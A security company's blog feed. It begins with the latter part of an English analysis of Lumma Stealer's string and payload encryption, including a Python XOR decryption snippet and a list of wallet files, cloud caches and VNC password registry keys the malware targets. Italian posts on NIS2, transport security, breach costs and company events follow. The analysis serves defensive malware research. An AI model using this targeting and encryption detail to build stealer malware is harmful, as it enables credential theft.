Finally, in the terminal on the right, the output of the Python script used to emulate an HTTPS server is visible. Note how, in this phase, unlike the decryption of the command configurations, the key and the nonce are not placed at the beginning, but at the end of the encrypted payload.

Update 01/04/2025: Strings encryption

Retrieved configuration strings are also encrypted

In this update, a change has been observed in the handling of commands sent by the C2 server in response to the recive_message command. In previous versions, the content of the JSON file sent by the server (after decryption with XOR or ChaCha20) was cleartext, as in the following example (simplified for clarity):

{
  "v": 4,
  "se": true,
  "ad": false,
  "vm": false,
  "ex": [...],
  "mx": [
    {
      "en": "webextension@metamask.io",
      "ez": "MetaMask",
      "et": "\"params\":{\"iterations\":600000}"
    }
  ],
  "c": [...]
}

In newer versions, all text values are encrypted instead. Here is a representative example of the mx section:

{
  "v": 4,
  "se": true,
  "ad": false,
  "vm": false,
  "ex": [...],
  "mx": [
    {
      "en": "Ci1CgzXEg0F9LSeDV8TmQXItNoNQxO1BeS0rg1rE7UFKLS+DUMT3QWstL4NUxPBBYS1sg1zE7EE=",
      "ez": "Ci1CgzXEg0FHLSeDQcTiQUctI4NGxOhB",
      "et": "Ci1CgzXEg0EoLTKDVMTxQWstL4NGxKFBMC05gxfE6kF+LSeDR8TiQX4tK4NaxO1BeS1ggw\\/EtUE6LXKDBcSzQTotP4M="
    }
  ],
  "c": [...]
}

By decoding the strings in base64, we obtain binary data, which has an interesting feature: the first 8 bytes of each encrypted blob are identical, suggesting that these constitute the key used for a symmetric XOR operation (similar to the decryption of the configurations with lummav4).

encs = [
  b"\n-B\x835\xc4\x83A}-'\x83W\xc4\xe6Ar-6\x83P\xc4\xedAy-+\x83Z \xc4\xedAJ-/\x83P\xc4\xf7Ak-/\x83T\xc4\xf0Aa-l\x83\\\xc4\xecA",
  b"\n-B\x835\xc4\x83AG-'\x83A\xc4\xe2AG-#\x83F\xc4\xe8A",
  b"\n-B\x835\xc4\x83A(-2\x83T\xc4\xf1Ak-/\x83F\xc4\xa1A0-9\x83\x17\xc4\xeaA~-'\x83G\xc4\xe2A~-+\x83Z\xc4\xedAy-`\x83\x0f\xc4\xb5A:-r\x83\x05\xc4\xb3A:-?\x83",
]

A quick implementation to see if it works or not:

for enc in encs:
  key = enc[:8] * 10
  xored = bytearray([enc[i] ^ key[i] for i in range(len(enc))])
  # null (`\x00`) byte removal, presumably introduced as padding
  dec = [bytes([i]) for i in xored.strip(b"\x00") if bytes([i]) != b"\x00"]
  print(b"".join(dec).decode("utf-8"))

Decrypted output:

webextension@metamask.io
MetaMask
"params":{"iterations":600000}

To generalize this intuition I wrote a Python script that decrypts the entire json file. Below I report the additions made between version 4 and version 6.3 (at the latest update) of the json file:

Browser extension:
- Blade Wallet (abogmiocnneedmmepnohnhlijcjpcifd)
Folders:
- %appdata%\Armory → *.wallet
- %appdata%\gcloud → *.db, *.json
- %localappdata%\.IdentityService → msal.cache, msalv2.cache
- UltraVNC → ultravnc.ini from %programw6432% and %programfiles%
Registries:
- \\REGISTRY\\MACHINE\\SOFTWARE\\TightVNC\\Server → Password
- \\REGISTRY\\MACHINE\\SOFTWARE\\TightVNC\\Server → ControlPassword
- \\REGISTRY\\MACHINE\\SOFTWARE\\RealVNC\\vncserver → Password
- \\REGISTRY\\CURRENT_USER\\Software\\TigerVNC\\WinVNC4 → Password

Dropped file decryption

As discussed in the namesake section from version 4, the previous method consisted of Base64 decoding followed by an XOR operation using a 32-byte key prepended to the ciphertext. This approach was also used to decrypt network communications in Lumma Stealer v4.

Following the update to the encrypted strings in the configuration file retrieved via the recive_message command, the same encryption method has now been also applied to the dropped files received through the get_message command. Notably, the key has been reduced to just 8 bytes.

Lumma Stealer seen from the Certego perspective

Certego detects Lumma Stealer through a combination of signature-based detection via IDS, behavioral monitoring of endpoints via EDR, and threat intelligence correlation based on known indicators and campaign characteristics. Despite its widespread distribution, Lumma poses limited risk to enterprise companies that are properly protected by a proactive, first-class MDR system.

Lumma Stealer has shown minimal impact on our Customers using PanOptikon® platform. To date, we have only seen 17 cases involving this malware specifically. Its limited presence is consistent with its low effectiveness in enterprise environments, where enterprise-level endpoint protection, EDR, and network-level defenses - together with Certego services - significantly reduce its success rate.

What we observed is that when corporate credentials compromised by Lumma do surface, they typically originate from personal devices. In several cases, employees had saved work credentials in browser password managers on their home computers, which were subsequently infected by Lumma or similar stealers such as RedLine, leading to enterprise credential compromise, along with personal ones.

A personal consideration

It is worth noting that in the transition from version 4 to version 6.3, the threat actor first modified the decryption method used for hardcoded C2 domains and later applied the same method to the communication protocol. In a similar way, the decryption routine from version 4, which was based on Base64 decoding followed by an XOR operation, was reused to encrypt the strings contained in the JSON structures of the recive_message and get_message commands, although with a reduced key length.

From a defensive perspective, this reuse and redistribution of known logic greatly simplifies the analysis process and makes the malware's future behavior more predictable. If a future update is released, it is reasonable to expect that the decryption method for hardcoded C2 domains will be changed first. Then, after approximately two to three months, the same technique will likely be applied to the communication logic, with some structural adjustments. The previously used method may still be employed in secondary or less critical components as string encryption.

Final Remarks

This analysis was conducted between October 2024 and April 2025. During this period, we chose not to publish any preliminary blog posts, as revealing technical details about Lumma Stealer could have prompted its administrators to release an updated version. Such a change would have significantly hindered the progress of the thesis work. The full thesis, which documents the analysis and the development of the associated framework, will be published shortly and linked at the top of this blog post.

Oltre la tempesta | Alleanze e tecnologie per la difesa digitale

Pier Giorgio Bergonzi — Tue, 17 Jun 2025 22:00:00 GMT

Quest’anno il Cybersecurity Event di Certego, ci porterà nella suggestiva Darsena del Sale di Cervia, un luogo sospeso tra storia e innovazione.

Mercoledì 18 giugno esploreremo il valore delle alleanze e delle tecnologie evolute in un contesto digitale sempre più instabile e imprevedibile. Un invito a riflettere su come affrontare la complessità e l’imprevedibilità del mondo digitale attraverso la collaborazione, l’innovazione tecnologica e una maggiore consapevolezza.

Scopri i dettagli dell'evento.

IntelOwl 6.4.0

Pier Giorgio Bergonzi, Product Marketing — Wed, 21 May 2025 22:00:00 GMT

È disponibile la nuova release 6.4.0 di IntelOwl, frutto di un percorso di evoluzione continua volto a rendere sempre più efficaci, strutturate e integrate le attività di Threat Intelligence e le operazioni del Security Operation Team di Certego.

Questa versione introduce nuove funzionalità chiave che rappresentano un importante passo avanti nella capacità della piattaforma di supportare gli analisti nella valutazione, correlazione e gestione degli indicatori di compromissione.

1. Analyzable: riferimento unico per ogni oggetto analizzato

Con la versione 6.4.0, la funzionalità Analyzable introduce una rappresentazione unificata dell’oggetto analizzato — che si tratti di un osservabile (come un IP, dominio, hash) o di un campione (sample). Ora, ogni job di analisi è direttamente associato al relativo Analyzable, rendendo possibile collegare più report di analisi a un unico oggetto. Questo approccio consente una visione più completa e strutturata della cronologia analitica di un osservabile, semplificando la consultazione dei risultati e la loro correlazione nel tempo.

2. Data Models: standardizzazione avanzata per l’interoperabilità degli output

Ogni analyzer in IntelOwl produce risultati strutturalmente diversi, riflettendo le specificità degli strumenti e delle tecniche utilizzate. Sebbene questa flessibilità sia necessaria, confrontare in modo sistematico un’informazione ricorrente tra più analyzer poteva richiedere un’analisi manuale e frammentata da parte dell’utente. La versione 6.4.0 introduce il nuovo sistema dei Data Models, che consente di mappare i dati rilevanti generati dagli analyzer all’interno di uno schema strutturato e condiviso. Questo approccio riduce la necessità di interpretazioni manuali e favorisce una lettura più rapida, omogenea e comparabile delle informazioni critiche.

3. User Events: valutazioni personalizzate a supporto dell’analisi

La versione 6.4.0 introduce un aggiornamento che consente agli utenti di associare manualmente valutazioni e osservazioni personalizzate a un analyzable, tramite gli User Events. Questa funzionalità permette, ad esempio, di registrare che un dominio analizzato (es. google.com) è ritenuto lecito con un elevato livello di confidenza. Le annotazioni vengono così strutturate in modo coerente all’interno della piattaforma, arricchendo il contesto analitico con informazioni qualitative generate dagli analisti stessi. In questo modo, IntelOwl integra la conoscenza umana con i dati tecnici, favorendo una gestione collaborativa e condivisa degli osservabili.

4. Engine: sintesi automatica tra dati tecnici e input umani

L’Engine aggiornato ha il compito di combinare in modo intelligente i dati provenienti dagli analyzer con i contributi degli analisti (tramite User Events), fornendo una valutazione aggregata per ogni job. Il risultato è un’indicazione più completa, utile per indirizzare rapidamente l’attenzione sugli elementi più rilevanti.

IntelOwl è integrata nativamente con la piattaforma di Unified Security Operations PanOptikon, costituendo uno strumento fondamentale per gli analisti di Certego. Grazie a questa integrazione, gli analisti possono contare su un sistema di Threat Intelligence ad alta precisione e affidabilità, che consente di:

monitorare e validare in tempo reale gli indicatori di compromissione (IOC);
svolgere analisi approfondite su domini, file, IP, hash e altri osservabili;
correlare evidenze tecniche e conoscenze umane in un unico flusso operativo integrato.

IntelOwl 6.4.0 potenzia ulteriormente la capacità di Certego di rispondere con tempestività e precisione agli attacchi informatici, rafforzando il presidio continuo contro le minacce avanzate.

Cybersecurity nei trasporti

Wed, 14 May 2025 22:00:00 GMT

Sommario

Cybersecurity nei trasporti: tra minacce emergenti, obblighi normativi e la risposta operativa - A cura di Certego
Trasporti sotto attacco: la cybersicurezza al centro della trasformazione digitale - Intervista a Renato Imbruglia, Segretario Generale di Conftrasporto
Navigare nella cybersicurezza: l’impegno di Assarmatori per una transizione digitale sicura - Intervista a Mattia Canevari, Responsabile Transizione Energetica e Regolazione Marittima di Assarmatori

Nel mondo dei trasporti, la sicurezza informatica è diventata una priorità strategica, così come sta accadendo in tutti gli altri settori. Crescono le minacce, aumentano gli obblighi normativi e si fanno sempre più complesse le esigenze operative. La Direttiva NIS2 impone nuovi standard, mentre le aziende si trovano a dover rafforzare la propria resilienza informatica.

Affrontare i rischi informatici è oggi una necessità inderogabile anche per il settore dei trasporti. In questo speciale del nostro blog approfondiamo il tema con il prezioso contributo di Mattia Canevari, Responsabile Transizione Energetica e Regolazione Marittima di Assarmatori, e Renato Imbruglia, Segretario Generale di Conftrasporto. Attraverso le loro analisi, approfondiamo i principali rischi e le risposte concrete che operatori e istituzioni stanno mettendo in campo.

1. Cybersecurity nei trasporti: tra minacce emergenti, obblighi normativi e la risposta operativa - A cura di Certego

Il settore dei trasporti è sempre più nel mirino delle minacce informatiche. Secondo il report "ENISA Threat Landscape 2024", gli attacchi informatici contro questo comparto in Europa hanno registrato un incremento dell’+11% rispetto al 2023. Un dato che riflette una tendenza preoccupante, dovuta alla crescente digitalizzazione, interconnessione e automazione delle infrastrutture critiche. Una lettura più dettagliata dei dati ENISA mostra come gli attacchi si distribuiscano in modo significativo tra i vari comparti:

Aviazione: 28%
Strade: 24%
Ferrovie: 21%
Marittimo: 18%
Attacchi generalizzati all’intero comparto: 8%

In particolare, il settore marittimo, con il suo 18%, rappresenta una superficie d’attacco strategica per la logistica globale, con rischi che spaziano dal sabotaggio dei sistemi OT al furto di informazioni riservate sui carichi e le rotte.

Quando il rischio diventa realtà: gli impatti concreti di un incidente informatico

Un incidente informatico nel settore dei trasporti può causare gravi conseguenze operative, economiche e reputazionali. Tra gli impatti immediati ci sono il blocco dei sistemi IT, interruzioni nei servizi e perdite finanziarie legate a ripristino, consulenze e possibili riscatti. La fiducia di clienti e partner può diminuire, danneggiando l’immagine pubblica. La compromissione dei dati sensibili espone l’azienda a sanzioni legali. Inoltre, si rischia l’interruzione della supply chain e la perdita di vantaggio competitivo. Infine, ci sono responsabilità legali e contrattuali che possono trasformare l’incidente in una crisi aziendale a tutto tondo.

NIS2: un nuovo standard europeo per la resilienza digitale

L’entrata in vigore della Direttiva NIS2 (Network and Information Security Directive 2) rappresenta un punto di svolta per tutte le organizzazioni “essenziali”, tra cui quelle del settore trasporti. Le aziende sono ora chiamate a rispettare obblighi stringenti, tra cui:

notifica degli incidenti entro 72 ore;
adozione di policy strutturate di gestione del rischio cyber;
formalizzazione di piani di business continuity;
collaborazione con i CSIRT nazionali per la gestione degli incidenti;
gestione della sicurezza della supply chain e condivisione delle informazioni sulle vulnerabilità.

NIS2: criticità applicative per le aziende

Complessità nel rispettare la tempistica delle 72 ore: Molte minacce informatiche sono sofisticate e silenziose, e la loro identificazione richiede tempo e analisi tecniche approfondite. Senza un adeguato supporto nelle fasi di identificazione e risposta, il rischio è di non riuscire a rispettare i tempi previsti dalla normativa, esponendo l'organizzazione a conseguenze legali e reputazionali.
Approccio organizzativo frammentato: La gestione della sicurezza non può più essere responsabilità esclusiva del reparto IT. La NIS2 impone un coinvolgimento diffuso e rende necessario un approccio strutturato a livello aziendale, in cui la sicurezza informatica sia riconosciuta come una responsabilità condivisa tra tutte le funzioni. Questo richiede l'implementazione di percorsi di formazione e consapevolezza rivolti a tutto il personale, superando la visione tradizionale che limita la cybersecurity al solo ambito tecnico — un cambiamento che, nella maggior parte delle organizzazioni, è ancora assente o in fase embrionale. La Direttiva NIS2 segna una trasformazione profonda nella gestione della sicurezza informatica in Europa e, anche per le aziende del settore trasporti, l’adeguamento richiede uno sforzo significativo sia sul piano tecnologico che organizzativo. Solo attraverso un approccio integrato, consapevole e proattivo è possibile rispondere efficacemente alle nuove sfide della resilienza digitale.

Il valore di un servizio MDR per la compliance e la risposta agli incidenti

In un contesto normativo sempre più articolato, come quello delineato dalla Direttiva NIS2, l’adozione di un servizio Managed Detection & Response (MDR) rappresenta una leva fondamentale anche per le aziende del settore trasporti, che vogliono garantire una gestione efficace degli incidenti di sicurezza informatica.

Un servizio MDR consente di:

1.Monitorare 24 ore su 24 l’ambiente infrastrutturale aziendale, identificando in tempo reale comportamenti anomali e minacce emergenti;
2.Gestire gli incidenti in modo strutturato, con l’apertura automatica di ticket, analisi specialistica degli eventi e attivazione di playbook di risposta coerenti con la gravità dell’attacco;
3.Supportare le aziende nella conformità normativa, facilitando la compilazione e l’invio della reportistica obbligatoria sul portale ACN, in linea con le tempistiche richieste dalla NIS2 (prima comunicazione entro 24 ore, notifica completa entro 72 ore, follow-up tecnico entro 30 giorni).

Grazie a tecnologie avanzate e a un team specializzato attivo H24, un servizio MDR può fare la differenza non solo nel contenere l’impatto di un incidente, ma anche nel documentarlo correttamente secondo gli standard attesi da ACN, contribuendo in modo determinante alla compliance e alla resilienza organizzativa.

Dal rischio all’opportunità: costruire sicurezza, creare valore

La compliance normativa, se ben gestita, può diventare un’occasione per rafforzare il proprio posizionamento competitivo. Per farlo, occorre andare oltre la logica del “firefighting” e adottare una strategia di cybersecurity integrata, condivisa, e realmente sostenibile. Certego affianca il settore trasporti in questo percorso, offrendo una visione concreta e misurabile della sicurezza informatica; perché ogni treno, ogni nave, ogni camion oggi è connesso. La vera destinazione è la resilienza.

2. Trasporti sotto attacco: la cybersicurezza al centro della trasformazione digitale - Intervista a Renato Imbruglia, Segretario Generale di Conftrasporto

Nel contesto di una trasformazione digitale sempre più rapida, il settore dei trasporti si trova ad affrontare sfide cruciali in materia di sicurezza informatica. Renato Imbruglia, Segretario Generale di Conftrasporto, ci offre una panoramica sulle principali minacce cyber che colpiscono il comparto e sulle difficoltà nell’integrare nuove tecnologie senza esporre le infrastrutture a rischi crescenti.

Quali sono le principali minacce informatiche che il settore dei trasporti sta attualmente affrontando? Il settore dei trasporti è attualmente esposto a una serie di minacce informatiche che, se non adeguatamente affrontate, potrebbero mettere a rischio la sicurezza e l'efficienza operativa. Tra le principali minacce troviamo attacchi ransomware, che mirano a cifrare i dati e richiedere un riscatto per il loro rilascio, causando gravi interruzioni nei servizi, e attacchi di tipo DDoS (Distributed Denial of Service), che rappresentano un'altra minaccia significativa, poiché saturano le risorse di rete, rendendo i servizi indisponibili e compromettendo la business continuity. Inoltre, il comparto è esposto, al pari di altri settori, alle tecniche di phishing e social engineering, utilizzate per ingannare gli utenti e ottenere accesso a informazioni sensibili; tali accessi abusivi ai sistemi informatici aziendali costituiscono un ulteriore rischio, ovvero quello che le penetrazioni all’interno dei sistemi abbia la finalità di rubare dati o causare danni all’infrastrutturazione di rete. Last but not least, il malware rappresenta, di fatto, una minaccia costante, con software malevoli che possono compromettere la sicurezza dei sistemi e delle reti aziendali.

Quali sono le sfide principali nell’integrare nuove tecnologie digitali nel settore dei trasporti senza compromettere la sicurezza informatica? L'integrazione di nuove tecnologie digitali nel settore dei trasporti presenta diverse sfide che devono essere affrontate per garantire la sicurezza informatica. Una delle principali è la gestione della sicurezza della catena di fornitura, assicurandosi che i fornitori rispettino gli standard di sicurezza e non introducano vulnerabilità nei sistemi. La continuità operativa è un altro aspetto cruciale, poiché è necessario garantire che i sistemi critici possano continuare a funzionare anche in caso di attacco informatico. La formazione del personale è essenziale per educare i dipendenti sulle pratiche di sicurezza informatica e prepararli, al contempo, a riconoscere e rispondere alle minacce. Inoltre, l'adattamento delle infrastrutture esistenti per supportare nuove tecnologie senza introdurre vulnerabilità, rappresenta una sfida senz’altro significativa. È fondamentale, pertanto, aggiornare le infrastrutture in modo sicuro, implementando misure di protezione adeguate per prevenire accessi non autorizzati e attacchi informatici.

3. Navigare nella cybersicurezza: l’impegno di Assarmatori per una transizione digitale sicura - Intervista a Mattia Canevari, Responsabile Transizione Energetica e Regolazione Marittima di Assarmatori

In che modo l’associazione supporta le aziende associate nell’implementazione di misure di cybersicurezza efficaci? Assarmatori ha costantemente supportato i propri associati realizzando rapporti di sintesi della Direttiva, corredate di analisi d’impatto sul business dei trasporti marittimi, evidenziando le principali criticità del comparto. L’associazione ha inoltre fornito assistenza in merito al processo di riconoscimento delle aziende associate all’interno delle categorie previste dalla NIS2, oltre che ad una corretta registrazione presso il portale ACN. La costante collaborazione in materia con enti governativi, come l'Agenzia per la Cybersicurezza Nazionale (ACN) appunto, ma anche con l’Autorità NIS competente (Ministero dei Trasporti), si è tradotta nella partecipazione ai tavoli di lavoro ministeriali per affrontare questa sfida comune e portare le istanze del comparto in evidenza nelle giuste sedi, diventando punto di riferimento per il comparto armatoriale. In collaborazione con Clusit, Associazione Italiana per la Sicurezza Informatica, organizzazione no-profit fondata nel 2000 a Milano, che rappresenta il più importante punto di riferimento per la sicurezza informatica in Italia, contribuendo a creare una comunità informata e preparata ad affrontare le sfide del cyberspazio, Assarmatori ha realizzato, il 4 aprile scorso, un webinar sulla NIS2, mettendo in rilievo gli aspetti essenziali per una compliance normativa, ma ponendo anche le basi per un eventuale supporto di tipo tecnico; tale collaborazione tra le associazioni mira dunque a identificare linee guida e best practices per l'implementazione di misure di sicurezza, aiutando le aziende a proteggere le loro operazioni e a garantire la conformità alle normative vigenti.

Qual è l’approccio dell’associazione riguardo alla collaborazione con enti governativi e altre industrie per migliorare la resilienza informatica del settore dei trasporti? La partnership di Assarmatori con Clusit, l'Associazione Italiana per la Sicurezza Informatica, rappresenta un elemento chiave di questa strategia. Attraverso Clusit, Assarmatori entra in contatto con altre industry, condividendo esperienze e identificando punti di contatto e possibili miglioramenti per la strategia di comparto. Questa sinergia permetterà di sviluppare soluzioni condivise con tutti gli stakeholder e di affrontare questa sfida comune in modo coordinato. L’associazione svolge inoltre un ruolo di referente per il comparto in sede di Autorità NIS e ACN, come già anticipato, attraverso una costante interlocuzione ministeriale. Questo dialogo continuo con le autorità competenti è volto a lavorare in perfetta sintonia e a tutelare il comparto armatoriale da rischi potenziali relativi all'applicazione della Direttiva NIS2.

In che modo l’associazione promuove la consapevolezza e la formazione sulla cybersicurezza tra i membri del settore? Assarmatori promuove attivamente la consapevolezza e la formazione sulla cybersicurezza tra i membri del settore attraverso diverse iniziative. Eventi a carattere formativo, informativo e divulgativo come il webinar del 4 aprile scorso nel quale è stata fornita, assieme a Clusit, un’overview completa della Direttiva NIS2 e delle sfide legate alla cybersicurezza. Questi eventi offrono ai partecipanti l'opportunità di acquisire conoscenze aggiornate sulle minacce informatiche, sulle migliori pratiche di sicurezza e sul processo di compliance normativa. Inoltre, Assarmatori formalizza periodicamente documenti informativi, tra cui rapporti, sintesi e analisi delle principali novità in materia di sicurezza informatica, che forniscono informazioni di dettaglio in materia. Infine, l'associazione promuove tra i propri associati campagne di sensibilizzazione per aumentare la consapevolezza sulla sicurezza informatica tra i diversi membri, incoraggiando una cultura della sicurezza che coinvolga tutti i dipendenti, non solo quelli del reparto IT.

Threat Intelligence - Vulnerability insights

Mon, 12 May 2025 22:00:00 GMT

Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di aprile 2025, identificate dal nostro team di Threat Intelligence.

Compila il form e ricevi il PDF

Quanto costa un Data Breach?

Pier Giorgio Bergonzi, Product Marketing — Thu, 08 May 2025 22:00:00 GMT

Il panorama della sicurezza informatica è segnato da una crescita inarrestabile delle minacce, sempre più sofisticate e pervasive. In questo contesto, diventa cruciale dotarsi di strumenti e strategie efficaci per proteggersi. Ma cosa accade quando un’azienda non è adeguatamente protetta? E qual è il vero costo di un attacco informatico?

L’Italia nel mirino: i numeri parlano chiaro

Secondo il Rapporto Clusit 2025, l’Italia ha subito un aumento del 15,2% negli incidenti informatici nel 2024 rispetto all’anno precedente, mantenendosi stabilmente tra i Paesi più colpiti con il 10,1% degli attacchi globali. A certificare la difficoltà delle aziende italiane nel contrastare queste minacce è anche l’Osservatorio Cybersecurity del Politecnico di Milano: oltre il 70% delle grandi imprese ha subito almeno un attacco nel corso dell’ultimo anno, nonostante gli investimenti in sicurezza. Settori strategici, come il manifatturiero, sono stati tra i più colpiti, rappresentando il 19% degli attacchi totali nel Paese, con un incremento superiore al 190% rispetto all’anno precedente. Questo trend sottolinea come i criminali informatici puntino a settori chiave per sfruttare vulnerabilità spesso trascurate.

L'impatto economico degli attacchi

A fotografare l’impatto economico è il “Cost of a Data Breach Report 2024”: in Italia, il costo medio di una violazione dei dati ha raggiunto 4,37 milioni di euro, con un aumento del 23% rispetto all’anno precedente — il più elevato dalla pandemia. Non si tratta solo di costi diretti, come il pagamento di riscatti (ransomware) o le spese per ripristinare i sistemi compromessi. Le aziende affrontano anche danni collaterali, tra cui:

Perdita di reputazione: il calo di fiducia da parte di clienti e partner può avere conseguenze durature.
Interruzioni operative: lunghi periodi di inattività che compromettono la produttività.
Sanzioni regolamentari: nel caso di violazioni del GDPR o altre normative.

Le PMI

Il Rapporto Clusit 2025 conferma una realtà ormai sempre più evidente: le piccole e medie imprese italiane sono diventate uno degli obiettivi preferiti del cybercrime. Nel 2024, l’Italia ha registrato un incremento del 15,2% degli incidenti informatici rispetto all’anno precedente, rappresentando il 10,1% del totale mondiale. A preoccupare non è solo la quantità, ma anche la natura degli attacchi: il 78% è stato classificato come cybercrime puro, in crescita del 40,6% rispetto al 2023. Questo scenario è particolarmente critico per le PMI, spesso sprovviste delle risorse necessarie per difendersi. L’adozione di strumenti avanzati, la presenza di competenze interne e una strategia strutturata di difesa restano ancora fuori dalla portata di molte realtà aziendali. Dal rapporto emergono alcune evidenze che spiegano la vulnerabilità di questo segmento:

Budget limitati per la sicurezza: molte PMI non riescono a destinare risorse sufficienti per proteggersi, diventando prede ideali per attacchi mirati e opportunistici.
Settori chiave sotto pressione: ambiti come manifatturiero e trasporti risultano particolarmente esposti, con impatti potenzialmente critici per l’intera filiera produttiva nazionale.

I servizi MDR come risposta completa

Di fronte a questa situazione, l’adozione di un servizio di Managed Detection and Response (MDR) rappresenta una soluzione strategica. Questo approccio avanzato non si limita a rilevare le minacce, ma agisce attivamente per contenerle e neutralizzarle con tempestività. Affidarsi a un servizio MDR significa poter contare su un monitoraggio continuo 24/7, su analisi comportamentali avanzate, sull’integrazione di threat intelligence aggiornata e su un team di esperti sempre operativo. È un modello che trasforma la sicurezza informatica da funzione reattiva a pilastro strategico del business, riducendo al minimo i tempi di risposta e l’impatto degli attacchi. In un contesto caratterizzato da minacce in costante evoluzione, l’MDR consente anche alle realtà meno strutturate – come molte PMI italiane – di colmare rapidamente le proprie lacune in termini di competenze, risorse e tecnologie, rafforzando la resilienza digitale e garantendo la continuità operativa.

Il costo dell’inerzia

Un servizio di Managed Detection & Response non si limita a rilevare e contrastare le minacce, ma, grazie a un approccio proattivo, consente di adattare continuamente le difese all’evoluzione del panorama cyber. È una garanzia di continuità operativa e protezione dinamica, indispensabile per le aziende italiane che vogliono restare competitive in un contesto sempre più sfidante.

Save the date evento PanoptiCON 2025

Pier Giorgio Bergonzi, Product Marketing — Tue, 22 Apr 2025 22:00:00 GMT

Premessa

Nel 2023 per celebrare i nostri 10 anni abbiamo riletto Sun Zun e ricordato Bruce Lee, servendoci della forma dell’acqua per descrivere nuove “forme” di adattamento e di difesa. Anche nel 2024 siamo partiti da metafore mutuate da madre natura, origine e custode di evoluzione per rileggere Nassim Nicholas Taleb e parlare di antifragilità. A fronte di condizione avverse la natura mette in atto non solo adattamento e flessibilità ma anche antifragilità che indica l’attitudine ad accettare la necessità di cambiamento e migliorare attraverso l’apprendimento. Similitudini che si declinano anche sui nostri sistemi aziendali e sulle nostre capacità di trasformazione e di miglioramento a fronte di sollecitazioni, fattori di stress, volatilità e disordine.

PanoptiCON 2025

Il Cyber Security Event di Certego, si terrà il 18 giugno, nella Dersena del Sale, a Cervia (RA).

Non cambiamo solo noi. Non siamo gli unici a evolvere, a stringere nuove alleanze per prosperare. Anche il cybercrime si trasforma velocemente per arricchirsi e creare disordine. Dietro un attacco informatico ci sono vere e proprie organizzazioni criminali ben equipaggiate, in grado di attaccare chiunque, non importa essere grandi o piccoli. Viviamo in un mondo liquido, esposti ogni giorno come in un oceano in tempesta, dove i cambiamenti arrivano rapidi e asimmetrici.

Con PanoptiCon2025 vogliamo stimolare una riflessione su come possiamo prepararci a reagire con maggiore consapevolezza, attraverso la sicurezza del lavoro di squadra, per riflettere su come affrontare le onde più alte con lucidità, responsabilità e visione strategica. Perché nella sicurezza digitale non basta navigare da soli: servono equipaggi coesi, alleanze solide e tecnologie evolute.

MAI SOLI: è tempo di costruire nuove alleanze o rinsaldare quelle esistenti basate su lealtà e fiducia soprattutto in materia di cyber security. Secondo la visione di Certego, l’essere umano resta al timone, ma è affiancato dalla tecnologia: iperautomazione come esercizio di logiche, intelligenza artificiale come capacità di analisi. Un approccio che richiede lo studio del nemico, la preparazione agli scenari post-attacco, e ,soprattutto, una risposta rapida, flessibile, ibrida, antifragile.

“If an enemy has alliances, the problem is serious and the enemy’s position is strong; if it has no alliances, the problem is minor and the enemy’s position is weak.” * Sun Tzu

Le imprese globali stanno sempre più abbracciando il potere trasformativo dell’hyperautomation perchè è un approccio che va oltre l’automazione tradizionale comprendendo un’integrazione olistica di tecnologie avanzate fra cui gli Assistant SOC basati su AI.

Con giornalisti, sportivi, accademici ed esperti navigheremo le onde di questo complicato presente condividendo visioni, esperienze, soluzioni e consigli pratici per aumentare la nostra consapevolezza e favorire lo sviluppo di un futuro più sicuro per tutti.

SAVE THE DATE Seguici sui nostri canali ufficiali per restare aggiornato sull’apertura delle iscrizioni e sull’agenda dell’evento.

NIS2, avviata la seconda fase

Pier Giorgio Bergonzi, Product Marketing — Tue, 15 Apr 2025 22:00:00 GMT

Lo scorso 10 aprile 2025, si è riunito il Tavolo per l’attuazione della disciplina NIS, segnando una tappa cruciale nel percorso di adeguamento alla direttiva europea NIS2. Durante l’incontro, presieduto dal Direttore Generale dell’ACN e con la partecipazione delle Autorità di settore e della Conferenza Stato-Regioni, sono state definite le specifiche di base per l’attuazione della normativa, formalizzate con la Determina ACN n. 164179 del 14 aprile 2025.

Misure di sicurezza informatica: requisiti articolati e scadenze definite

Tra i temi principali affrontati, vi sono le misure minime di sicurezza (art. 24 del decreto NIS), da adottare entro ottobre 2026. Le organizzazioni sono suddivise in due categorie:

Soggetti importanti: dovranno implementare 37 misure suddivise in 87 requisiti, sulla base del Framework Nazionale per la Cybersecurity e la Data Protection.
Soggetti essenziali: sono tenuti ad adottare ulteriori 6 misure e 29 requisiti, per un totale di 43 misure e 116 requisiti.

Si tratta di un impianto robusto, progettato per adattarsi alle caratteristiche dei singoli settori, ma che richiederà una pianificazione attenta e investimenti in competenze, strumenti e servizi.

Obbligo di notifica degli incidenti significativi

Dal 1° gennaio 2026, entreranno in vigore gli obblighi di notifica degli incidenti (art. 25), con criteri distinti tra soggetti importanti ed essenziali:

I soggetti essenziali dovranno monitorare quattro tipologie di incidenti.
I soggetti importanti, invece, saranno tenuti a notificare in relazione a tre fattispecie.

Questa differenziazione implica una maggiore pressione operativa sui soggetti più critici, che avranno bisogno di strumenti e servizi adeguati per rilevare, analizzare e notificare rapidamente ogni incidente.

Mappatura in corso: oltre 20.000 soggetti coinvolti

Secondo quanto riportato da ACN, l’elenco dei soggetti NIS conta oggi oltre 20.000 organizzazioni, di cui più di 5.000 classificate come essenziali. A partire dal 12 aprile, l’Agenzia ha avviato la comunicazione formale agli interessati attraverso la piattaforma NIS.

Prossime scadenze: aggiornamento delle informazioni e designazione del punto di contatto

Dal 15 aprile al 31 maggio 2025, i soggetti NIS sono chiamati a:

Designare il sostituto del punto di contatto.
Aggiornare le informazioni richieste dall’art. 7 del decreto NIS, come:
- Componenti degli organi direttivi
- Indirizzi IP pubblici e statici
- Nomi di dominio in uso
Notificare gli accordi volontari di condivisione delle informazioni sulla sicurezza (come da Determina ACN n. 136118/2025).

Con la pubblicazione della Determina n. 164179, l’Italia entra nella seconda fase di attuazione della NIS2: quella dell’implementazione concreta. Le scadenze sono ravvicinate e gli obblighi dettagliati, rendendo indispensabile una governance strutturata e servizi di cybersecurity gestiti, come i servizi MDR erogati da Certego, per garantire una risposta efficace agli incidenti e il rispetto delle tempistiche imposte dalla normativa.

Threat Intelligence - Vulnerability insights

Mon, 14 Apr 2025 22:00:00 GMT

Il seguente report mira a evidenziare le vulnerabilità più frequentemente sfruttate dagli attaccanti nel mese di marzo 2025, identificate dal nostro team di Threat Intelligence.

Compila il form e ricevi il PDF

Certego porta la Threat Intelligence italiana nel Marketplace di Anomali

Pier Giorgio Bergonzi, Product Marketing — Tue, 08 Apr 2025 22:00:00 GMT

Comunicato stampa.

